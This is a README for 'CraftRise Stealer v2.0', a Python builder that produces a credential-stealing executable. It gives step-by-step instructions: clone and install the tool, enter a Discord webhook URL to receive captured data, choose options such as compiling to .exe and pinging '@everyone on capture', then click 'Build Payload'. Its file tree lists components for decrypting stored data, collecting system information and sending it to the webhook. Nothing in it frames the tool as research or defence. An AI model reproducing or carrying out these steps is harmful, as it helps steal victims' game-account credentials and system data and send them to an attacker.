- Python 3.10 or higher (Download)
- Windows operating system
- Make sure to check "Add Python to PATH" during installation
-
Clone or download the repository:
git clone https://github.com/Kynarix/Craftrise-Stealer.git cd Craftrise-Stealer -
Install dependencies:
pip install -r requirements.txt
-
Run the application:
python run.py
- Enter your Discord Webhook URL in the input field.
- Select your preferred build options:
- Compile to
.exe(recommended) - Enable
@everyonemention on capture
- Compile to
- Click "Build Payload" and wait for the process to complete.
- The output file will be located in the
build/directory.
Craftrise-Stealer/
├── assets/
│ └── banner.png
├── src/
│ ├── core/
│ │ ├── decryptor.py # AES/Base64 decryption routines
│ │ ├── system_info.py # System metadata collector
│ │ └── webhook.py # Discord webhook dispatcher
│ └── gui/
│ ├── styles.py # Centralized QSS stylesheet
│ ├── template.py # Payload template engine
│ ├── builder.py # PyInstaller build thread
│ └── main_window.py # Primary application window
├── requirements.txt
├── run.py
└── README.md
Developed by PheXorA
Discord: phexora
CraftRise Stealer v2.0
